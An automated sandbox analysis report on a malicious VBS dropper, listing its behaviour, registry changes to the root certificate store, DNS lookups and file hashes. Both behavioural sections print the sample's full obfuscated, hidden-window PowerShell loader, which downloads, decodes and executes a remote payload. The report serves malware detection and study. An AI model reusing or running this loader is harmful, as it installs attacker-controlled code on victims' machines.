Malware Analysis Report

2025-01-18 01:14

Sample ID 240613-g4w5gaxcmb
Target FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs
SHA256 c1bdaee5fbb07524124295860759ee7feed5eacba39c10c1bb26071093f8c7ff
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

c1bdaee5fbb07524124295860759ee7feed5eacba39c10c1bb26071093f8c7ff

Threat Level: Likely malicious

The file FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs was found to be: Likely malicious.

Malicious Activity Summary

execution

Command and Scripting Interpreter: PowerShell

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 06:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 06:22

Reported

2024-06-13 06:24

Platform

win7-20240419-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Windows\System32\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Windows\System32\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Windows\System32\WScript.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden "$Stalinorglernes = 1;$darnedest='ring';$spedalskheds='S';Function Udbeningerne($Entitets20){$flskesmaakdet=$Entitets20.Length-$Stalinorglernes;$Devilishness=$spedalskheds+'ubst'+$darnedest;For( $Rebellious=4;$Rebellious -lt $flskesmaakdet;$Rebellious+=5){$Memorability+=$Entitets20.$Devilishness.Invoke( $Rebellious, $Stalinorglernes);}$Memorability;}function sealet($Firemandswhist){ & ($Preflattery) ($Firemandswhist);}$Naos158=Udbeningerne 'K.rdMVedkoSupezUpliiHandlOve,lJi.gaAfst/G,yw5Foge.M,mo0Diap ta l(,illWLedeiDoddnRicidA droDetewHaems.pur Mat.NSkrlTD,na Unde1brdl0F,ne.Rynk0Mode;Desm KlarWS.ksivot.nNorm6W.nd4N,tr;exum Krydxejde6 ,ar4Bihe;Musc CounrCo,ev.ner:Magn1 ,or2 Non1Chon.Sauc0Fa.i)Preb teleGNookeInfec rrek.yldoReag/Abai2 Bar0 Sub1Bayr0,neq0.are1Diel0Aqua1Natu An dFTetriShorrU,leeOpahfO.sho ChaxDoku/Fisk1Frem2Cape1Offs.fo d0 sys ';$Vivified=Udbeningerne 'obs,UkrypsX rneBuskrShea-LockAFpspgHelte AdrnSte.t Pru ';$Frskolealdrenes=Udbeningerne 'BekrhSejut awktSkolp El.s ,um:X no/Go,b/ Dandsagaa ammt ,reeStopaBetvdAmbivMultiUn.oeKendsSkyu.Lkusn Manlover/ .ekcAmoegTr miMixe-Asdib M.tiSkadnRdby/Str,P SecoPos,sTi sn VitaSe,inU ati.ifeaHydrnOpby. Extt Laeh drinR,de ';$Rnen=Udbeningerne 'R,ve>Serv ';$Preflattery=Udbeningerne ' .amiRed.eUninxComp ';$Sammenklumpningernes='Vejgreb';$Fangstkvoten = Udbeningerne 'UndaePo ncDiffhUdbuoKrat ont% DenaIntepCo,tpM.shdGestaUnortWi.pa asa%.iob\ AmoQK,esu Ko.aP.eat SacrA.teaS vvlTill.BabeU.ishn Resrboul Stu,&,ari&Ac n KryeNvnic ,odhrandoPlo. decutT.ma ';sealet (Udbeningerne ',esk$Opo g,utolNo,co PilbtripaFishl Rej:Se,vKGl.erSvajo TempRefad He.uInn eSyn.s.ost= Go,(BuricSjlsmteksd Su, vin/LamecByg. Pro$ UnwFAut.aSwarnHomogpetisTidst Refk.enrvDonkoSemitE,teeAn sn ,nk)Atte ');sealet (Udbeningerne 'Mi.j$ RelgPaaslmauloRaabbU spaholll Be,:.lvrRGenee Jo,hBustnHeligSupeemilir ,uvs For1,nfr9 Arc8 B,a= Uan$ KeeFIndur BelsaecikmaxgoAfsllFreme LetaB lllRunhdGar rfriae .hanVarmeSd,ys.eto.NitrsOverp rbelAabei,orstEt r(Par $EsseR Genn Shae PosnKa.s)V kt ');$Frskolealdrenes=$Rehngers198[0];$Curtailed= (Udbeningerne 'Over$ UndgDis,lM ndo xpobBalmaFactlDiak:CoadkSdesa BortPrevhVi.orBanki BronforvsAfs.=Cur.NA,baeFremwMaud-BeduO FonbUdkrj F,bePmkucE,sitBeme Fr nSBovny,napsKurttcoune ,trmRett.FremNAmaleSubstPoro.SkraWB llemos.b,araCEpiglSo si Bile Ud n,rumt');$Curtailed+=$Kropdues[1];sealet ($Curtailed);sealet (Udbeningerne 'Huth$AminkEx.ua letVidehKpperUh,ri A.rnFasts Tet. OveH T ceSlouaEe,edHan eDi,prMlgts.end[ Sem$Mo iVlithi TopvUnfliSvedfLipui miseKapidToxo]T te=Rh,t$Ho.iN ,uba LnsoBurbsStun1Kurs5Acin8Cyli ');$Cyclothurine=Udbeningerne 'Sche$Fej,kcercacos.t.ateh SkarGaliiS,kunabnosHens.Sp.yDInd.oBe.pwChimnCr slDiskoCharaHvald melFhaaniImbelRem,eA nd( ol$AgalFBib.rRegesUndekGlooo nrel .oreDervaOverlEndodHjemrhjoreEstinStj.eAngss T.n,G.av$theaFD,xtaFar.sTophtTj rlselwgDec.gUddaeMeha) Bag ';$Fastlgge=$Kropdues[0];sealet (Udbeningerne 'Iphi$,estgSekulSp,ko ap bHaanaStocl Ov.:MyxoBKo.feIn.ia Pals ,retSperiBarbeOprysSula=Tall( Tr Tper,e arrsE,tetStoo- TypP D,raGovet MamhEx.e kara$ SubF BeraM.rpsGe at In,lp tegf.tagPinaeB dd)kank ');while (!$Beasties) {sealet (Udbeningerne 'Sv.m$Subcg erel An,o Sipb GymaMo,olForg:Ho,mA.okum olb FyseShelr Hex=Mall$ComptSal rAutouInfee Exe ') ;sealet $Cyclothurine;sealet (Udbeningerne 'WhisSDagpt BooaI terBestt Un -MiswS ,apl .oceGo sePirapMud .kol4 Wan ');sealet (Udbeningerne '.rol$Indsg A.blreino Bo bUnf,a Pacl Udb:St.dBTanteMelaaImp,sTen tB,akibhaveS ums.ypo=Good( BarTklkre eursHamstUdsl-BesgP,ygeab,vitGearhblas La,r$ulmeF Astajapasragltyppel oragBoergbeepe,edi)rack ') ;sealet (Udbeningerne 'War,$Itc,g A,hl kapo E.sbMediaEmbolverd:YderSSengtAca yAnsvki teeCatetProt=Tope$ Kuag Tm,l ,vioGe.ebpre aOpk.lSlad: F lLCliquReakrHusmi asef RefaAdjukFejls Arm+.yro+ mer% But$FremRsuppe Fjoh hjen .argVrele.erar SlmsDe,e1no,p9Ambo8.est.SmigcErotoGorauBearnSul tSupe ') ;$Frskolealdrenes=$Rehngers198[$Styket];}$Skatteansttelser=295766;$Asylums=27528;sealet (Udbeningerne ' Alt$PinbgP atlUbekoR.stbHumoaSubclMell:annsF enft Hi.pM.li Bogi=Veti ind GNo,aeExset .ef-S ksCMagao NoanForntSna,eSlagnBrastEmpo ara$Ale,FD,akaForesMaz,t Du,lSp,sgMicrgHamse h d ');sealet (Udbeningerne ' Ser$HydrgMonoljewpoTe nbJubiaM ndlPara:,mbePBustuKldnpCornpiag,eBemurOvers Hng Para=rapt Bond[,lkeSAmeny ,als Begt Bo.ePu,lmBurr.K.kaCBuksoFamin V.lvMagre Lyor agbt Fri]Chim:Hove:Fde,F P,erTeksoLastmU,skB Skra i,ds Ho e Nav6Inte4Si,uSLemmtUd.ar ReniSandnFelsg Con(Tegm$FlueFUd at.awbp Ytt),orp ');sealet (Udbeningerne 'Cote$exteg S,elKereoSuumbM niaTilll,ent:ForeTUdenrAlipu SchtRonim revu .amnPinndPosteSub. Tue=Mann livs[TjenSCottyStersindttSynaeAcromBykv. nkaT.mbiepreexGelitretr.scanELakan Be,cBirdo Ta.dChami romnMdergKapn]Unde:Hand: O,lALancSHippCSprjIAu,tIBour.FretGChiae ert eagSExodtRa.ir upiKuglnCompg Frk( .on$S,imPDaymuMuhap BlapStoreudprr ppsNonl)U,de ');sealet (Udbeningerne 'mili$InfugPreqlHemioUnpab ,elaF,rmlM rr:tudsT,ivir nfeDogmg,ariaStrad DreyB.ndnPenseTut,=Spiv$SubbTIstarUnm u bi.tBlanmNa.wuprosnInd.dFodbe Tab. ,ussCheeuRetvbKicksBacktHuser Ka,isyntnBaadgLagu(F.it$,olvSRohokdelmaPur tPar,t.isoe Ba,aLu snG.nns.egltBagst Mi eUdl.lKands Tume Skir abr,Kark$NougAPicksS tiyC.tylDioxuStimm Br,sCrow)Ciga ');sealet $Tregadyne;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Quatral.Unr && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp

Files

C:\Users\Admin\AppData\Local\Temp\CabC81.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\TarCA3.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

memory/2696-25-0x000007FEF56CE000-0x000007FEF56CF000-memory.dmp

memory/2696-26-0x000000001B560000-0x000000001B842000-memory.dmp

memory/2696-27-0x0000000002860000-0x0000000002868000-memory.dmp

memory/2696-28-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2696-29-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2696-30-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2696-31-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2696-32-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2696-33-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2696-34-0x000007FEF56CE000-0x000007FEF56CF000-memory.dmp

memory/2696-35-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 06:22

Reported

2024-06-13 06:24

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

144s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden "$Stalinorglernes = 1;$darnedest='ring';$spedalskheds='S';Function Udbeningerne($Entitets20){$flskesmaakdet=$Entitets20.Length-$Stalinorglernes;$Devilishness=$spedalskheds+'ubst'+$darnedest;For( $Rebellious=4;$Rebellious -lt $flskesmaakdet;$Rebellious+=5){$Memorability+=$Entitets20.$Devilishness.Invoke( $Rebellious, $Stalinorglernes);}$Memorability;}function sealet($Firemandswhist){ & ($Preflattery) ($Firemandswhist);}$Naos158=Udbeningerne 'K.rdMVedkoSupezUpliiHandlOve,lJi.gaAfst/G,yw5Foge.M,mo0Diap ta l(,illWLedeiDoddnRicidA droDetewHaems.pur Mat.NSkrlTD,na Unde1brdl0F,ne.Rynk0Mode;Desm KlarWS.ksivot.nNorm6W.nd4N,tr;exum Krydxejde6 ,ar4Bihe;Musc CounrCo,ev.ner:Magn1 ,or2 Non1Chon.Sauc0Fa.i)Preb teleGNookeInfec rrek.yldoReag/Abai2 Bar0 Sub1Bayr0,neq0.are1Diel0Aqua1Natu An dFTetriShorrU,leeOpahfO.sho ChaxDoku/Fisk1Frem2Cape1Offs.fo d0 sys ';$Vivified=Udbeningerne 'obs,UkrypsX rneBuskrShea-LockAFpspgHelte AdrnSte.t Pru ';$Frskolealdrenes=Udbeningerne 'BekrhSejut awktSkolp El.s ,um:X no/Go,b/ Dandsagaa ammt ,reeStopaBetvdAmbivMultiUn.oeKendsSkyu.Lkusn Manlover/ .ekcAmoegTr miMixe-Asdib M.tiSkadnRdby/Str,P SecoPos,sTi sn VitaSe,inU ati.ifeaHydrnOpby. Extt Laeh drinR,de ';$Rnen=Udbeningerne 'R,ve>Serv ';$Preflattery=Udbeningerne ' .amiRed.eUninxComp ';$Sammenklumpningernes='Vejgreb';$Fangstkvoten = Udbeningerne 'UndaePo ncDiffhUdbuoKrat ont% DenaIntepCo,tpM.shdGestaUnortWi.pa asa%.iob\ AmoQK,esu Ko.aP.eat SacrA.teaS vvlTill.BabeU.ishn Resrboul Stu,&,ari&Ac n KryeNvnic ,odhrandoPlo. decutT.ma ';sealet (Udbeningerne ',esk$Opo g,utolNo,co PilbtripaFishl Rej:Se,vKGl.erSvajo TempRefad He.uInn eSyn.s.ost= Go,(BuricSjlsmteksd Su, vin/LamecByg. Pro$ UnwFAut.aSwarnHomogpetisTidst Refk.enrvDonkoSemitE,teeAn sn ,nk)Atte ');sealet (Udbeningerne 'Mi.j$ RelgPaaslmauloRaabbU spaholll Be,:.lvrRGenee Jo,hBustnHeligSupeemilir ,uvs For1,nfr9 Arc8 B,a= Uan$ KeeFIndur BelsaecikmaxgoAfsllFreme LetaB lllRunhdGar rfriae .hanVarmeSd,ys.eto.NitrsOverp rbelAabei,orstEt r(Par $EsseR Genn Shae PosnKa.s)V kt ');$Frskolealdrenes=$Rehngers198[0];$Curtailed= (Udbeningerne 'Over$ UndgDis,lM ndo xpobBalmaFactlDiak:CoadkSdesa BortPrevhVi.orBanki BronforvsAfs.=Cur.NA,baeFremwMaud-BeduO FonbUdkrj F,bePmkucE,sitBeme Fr nSBovny,napsKurttcoune ,trmRett.FremNAmaleSubstPoro.SkraWB llemos.b,araCEpiglSo si Bile Ud n,rumt');$Curtailed+=$Kropdues[1];sealet ($Curtailed);sealet (Udbeningerne 'Huth$AminkEx.ua letVidehKpperUh,ri A.rnFasts Tet. OveH T ceSlouaEe,edHan eDi,prMlgts.end[ Sem$Mo iVlithi TopvUnfliSvedfLipui miseKapidToxo]T te=Rh,t$Ho.iN ,uba LnsoBurbsStun1Kurs5Acin8Cyli ');$Cyclothurine=Udbeningerne 'Sche$Fej,kcercacos.t.ateh SkarGaliiS,kunabnosHens.Sp.yDInd.oBe.pwChimnCr slDiskoCharaHvald melFhaaniImbelRem,eA nd( ol$AgalFBib.rRegesUndekGlooo nrel .oreDervaOverlEndodHjemrhjoreEstinStj.eAngss T.n,G.av$theaFD,xtaFar.sTophtTj rlselwgDec.gUddaeMeha) Bag ';$Fastlgge=$Kropdues[0];sealet (Udbeningerne 'Iphi$,estgSekulSp,ko ap bHaanaStocl Ov.:MyxoBKo.feIn.ia Pals ,retSperiBarbeOprysSula=Tall( Tr Tper,e arrsE,tetStoo- TypP D,raGovet MamhEx.e kara$ SubF BeraM.rpsGe at In,lp tegf.tagPinaeB dd)kank ');while (!$Beasties) {sealet (Udbeningerne 'Sv.m$Subcg erel An,o Sipb GymaMo,olForg:Ho,mA.okum olb FyseShelr Hex=Mall$ComptSal rAutouInfee Exe ') ;sealet $Cyclothurine;sealet (Udbeningerne 'WhisSDagpt BooaI terBestt Un -MiswS ,apl .oceGo sePirapMud .kol4 Wan ');sealet (Udbeningerne '.rol$Indsg A.blreino Bo bUnf,a Pacl Udb:St.dBTanteMelaaImp,sTen tB,akibhaveS ums.ypo=Good( BarTklkre eursHamstUdsl-BesgP,ygeab,vitGearhblas La,r$ulmeF Astajapasragltyppel oragBoergbeepe,edi)rack ') ;sealet (Udbeningerne 'War,$Itc,g A,hl kapo E.sbMediaEmbolverd:YderSSengtAca yAnsvki teeCatetProt=Tope$ Kuag Tm,l ,vioGe.ebpre aOpk.lSlad: F lLCliquReakrHusmi asef RefaAdjukFejls Arm+.yro+ mer% But$FremRsuppe Fjoh hjen .argVrele.erar SlmsDe,e1no,p9Ambo8.est.SmigcErotoGorauBearnSul tSupe ') ;$Frskolealdrenes=$Rehngers198[$Styket];}$Skatteansttelser=295766;$Asylums=27528;sealet (Udbeningerne ' Alt$PinbgP atlUbekoR.stbHumoaSubclMell:annsF enft Hi.pM.li Bogi=Veti ind GNo,aeExset .ef-S ksCMagao NoanForntSna,eSlagnBrastEmpo ara$Ale,FD,akaForesMaz,t Du,lSp,sgMicrgHamse h d ');sealet (Udbeningerne ' Ser$HydrgMonoljewpoTe nbJubiaM ndlPara:,mbePBustuKldnpCornpiag,eBemurOvers Hng Para=rapt Bond[,lkeSAmeny ,als Begt Bo.ePu,lmBurr.K.kaCBuksoFamin V.lvMagre Lyor agbt Fri]Chim:Hove:Fde,F P,erTeksoLastmU,skB Skra i,ds Ho e Nav6Inte4Si,uSLemmtUd.ar ReniSandnFelsg Con(Tegm$FlueFUd at.awbp Ytt),orp ');sealet (Udbeningerne 'Cote$exteg S,elKereoSuumbM niaTilll,ent:ForeTUdenrAlipu SchtRonim revu .amnPinndPosteSub. Tue=Mann livs[TjenSCottyStersindttSynaeAcromBykv. nkaT.mbiepreexGelitretr.scanELakan Be,cBirdo Ta.dChami romnMdergKapn]Unde:Hand: O,lALancSHippCSprjIAu,tIBour.FretGChiae ert eagSExodtRa.ir upiKuglnCompg Frk( .on$S,imPDaymuMuhap BlapStoreudprr ppsNonl)U,de ');sealet (Udbeningerne 'mili$InfugPreqlHemioUnpab ,elaF,rmlM rr:tudsT,ivir nfeDogmg,ariaStrad DreyB.ndnPenseTut,=Spiv$SubbTIstarUnm u bi.tBlanmNa.wuprosnInd.dFodbe Tab. ,ussCheeuRetvbKicksBacktHuser Ka,isyntnBaadgLagu(F.it$,olvSRohokdelmaPur tPar,t.isoe Ba,aLu snG.nns.egltBagst Mi eUdl.lKands Tume Skir abr,Kark$NougAPicksS tiyC.tylDioxuStimm Br,sCrow)Ciga ');sealet $Tregadyne;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Quatral.Unr && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp
US 8.8.8.8:53 dateadvies.nl udp

Files

memory/3500-0-0x00007FFE14673000-0x00007FFE14675000-memory.dmp

memory/3500-1-0x000001CA5D160000-0x000001CA5D182000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b035ebpj.1vt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

